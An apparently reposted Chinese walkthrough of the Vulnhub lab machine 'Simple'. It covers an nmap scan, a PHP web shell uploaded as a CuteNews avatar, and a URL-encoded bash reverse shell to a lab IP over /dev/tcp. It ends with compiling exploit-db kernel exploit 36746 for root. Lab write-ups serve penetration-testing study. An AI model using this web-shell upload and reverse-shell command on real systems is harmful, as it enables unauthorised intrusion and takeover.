目录
信息收集
本地权限
权限提升

[Vulnhub] Simple CuteNews-CMS+Kernel权限提升

Мартин.2024-07-14 13:42

信息收集

IP Address Opening Ports
192.168.8.104 TCP:80

$ nmap -p- 192.168.8.104 --min-rate 1000 -sC -sV

bash 复制代码 
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Please Login / CuteNews
|_http-server-header: Apache/2.4.7 (Ubuntu)

本地权限

注册用户登录

Content-Disposition: form-data; name="avatar_file"; filename="reverse.php"

http://192.168.8.104/uploads/avatar_admin2_reverse.php?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.8.107%2F10032%200%3E%261%27

权限提升

$ cat /etc/os-release

https://www.exploit-db.com/exploits/36746

$ gcc 36746.c -static -o 36746

# ./36746

本文是转载文章,点击查看原文
如有侵权,请联系 xyy@jishuzhan.net 删除
相关推荐
千羽星弦2 分钟前
Kubernetes 集群搭建(一):k8s 从环境准备到 Calico 网络插件部署(1.16版本)
网络·容器·kubernetes
微风轻吟挽歌26 分钟前
HTTP 308 错误永久重定向 (Permanent Redirect)
网络·网络协议·http
Double Point1 小时前
(三十七)Dart 中使用 Pub 包管理系统与 HTTP 请求教程
网络·网络协议·http
写代码的小王吧7 小时前
【安全】Web渗透测试(全流程)_渗透测试学习流程图
linux·前端·网络·学习·安全·网络安全·ssh
GalaxyPokemon9 小时前
Muduo网络库实现 [七] - Connection模块
linux·服务器·网络
sniper_fandc10 小时前
网络编程—Socket套接字(TCP)
网络·tcp/ip·javaee
the_nov10 小时前
19.TCP相关实验
linux·服务器·网络·c++·tcp/ip
林中伊人11 小时前
家庭路由器wifi设置LAN2LAN和LAN2WAN
网络·路由器
XYN6111 小时前
【嵌入式学习3】基于python的tcp客户端、服务器
服务器·开发语言·网络·笔记·python·学习·tcp/ip
the_nov11 小时前
20.IP协议
linux·服务器·网络·c++·tcp/ip
热门推荐
01蓝桥杯真题演练:2023B组c/c++02我决定放弃搞 Java 了03如何在WPS和Word/Excel中直接使用DeepSeek功能04DeepSeek RAGFlow构建本地知识库系统05RAG 实践- Ollama+RagFlow 部署本地知识库06DeepSeek各版本说明与优缺点分析07生活电子常识--删除谷歌浏览器搜索记录08汽车上的各种质量:整备质量、总质量、装载质量、簧上质量、簧下质量09从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑10门票问题(c++题解)